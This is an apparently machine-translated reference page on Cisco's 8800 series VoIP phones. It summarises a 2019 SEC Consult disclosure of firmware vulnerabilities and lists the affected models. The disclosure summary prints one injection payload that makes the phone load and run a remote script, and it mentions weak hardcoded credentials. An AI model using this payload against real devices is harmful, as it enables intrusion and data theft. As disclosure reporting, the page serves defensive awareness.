Developers: | Cisco Systems |
Technology: | IP telephony, Office equipment |
Content |
Series 8800 includes models of corporate VoIP- phones Cisco.
2019
The vulnerability in series 8800 Cisco VoIP-phones allowing to steal data
The SEC Consult company announced on January 9, 2019 that it revealed a number of problems in shell programs of the popular systems of Internet telephony of Cisco VoIP Phone 8800.
As noted, one of key problems consists in a possibility of an injection of the JavaScript-like code using the built-in T9 keyboard. In other words, the malefactor can use the built-in digital-alphabetic keyboard of VoIP-phone for input of a malicious code.
For example, the host name of phone can be changed for the code approximately of such contents:
<img src=http://$IP/sec.js onload=exec()>hostname`>,
And it will honesty download the foreign file (sec.js) from a remote source and will start it.
In addition, contain in shell program of phones numerous outdate — and, therefore, unsafe — libraries of the code and also strictly coded login credentials. They are stored in the form of hashes in the file with the eloquent name / etc/passwd; hashing is made using outdated algorithm UNIX MD5+salt, in addition, as it appeared, passwords very weak so to open them and to get access to the device through SSH it was very trivial task.
It was succeeded to detect vulnerabilities with the help of own SEC Consult — IoT Inspector platform intended for search of problems in shell programs devices of Internet of Things.
The manual analysis which allowed to reveal in "firmware" of phones not documented, but easily operated functions allowing the potential malefactor to display memory dumps was also made and, respectively, to steal data.
It is impossible to call a problem ordinary — Oleg Galushkin, the security director of SEC Consult Services company, Russian representative office of SEC Consult considers. — Cisco VoIP-phones of series 8800 are actively used worldwide in a public sector and in large business — it concerns also Russia where these devices are popular in the largest corporations. Similar vulnerabilities pose a strategic threat for business already because it is very easy to operate them; stealing of crucial data in similar cases also appears "platitude". |
The described vulnerabilities are revealed in shell program of Cisco IP Phone 88xx of version 2-0-1 of ES-15 (ID: f86aa7612d9311e6).[1] Vulnerabilities affect[1] According to data provided by the corporation Cisco the following models:
- IP Conference Phone 8832
- IP Phone 8811
- IP Phone 8841
- IP Phone 8845
- IP Phone 8851
- IP Phone 8861
- IP Phone 8865
- Unified IP Conference Phone 8831
- Wireless IP Phone 8821
- Wireless IP Phone 8821-EX
According to SEC Consult, the vendor already made necessary corrections.
Series 8800 lineup
For January, 2019 the lineup VoIP- phone numbers Cisco of a series 8800 includes:
- Cisco IP Conference Phone 8832
- Cisco IP Phone 8865 Key Expansion Module
- Cisco IP Phone 8865
- Cisco IP Phone 8861
- Cisco IP Phone 8851
- Cisco IP Phone 8851/8861 Key Expansion Module
- Cisco IP Phone 8845
- Cisco IP Phone 8841
- Cisco IP Phone 8811
- Cisco IP Phone 8800 Key Expansion Module
- Cisco Unified IP Conference Phone 8831
- Cisco Wireless IP Phone 8821
- Cisco Wireless IP Phone 8821-EX
Notes
- ↑ by Multiple vulnerabilities in Cisco VoIP Phones (CVE-2018-0461)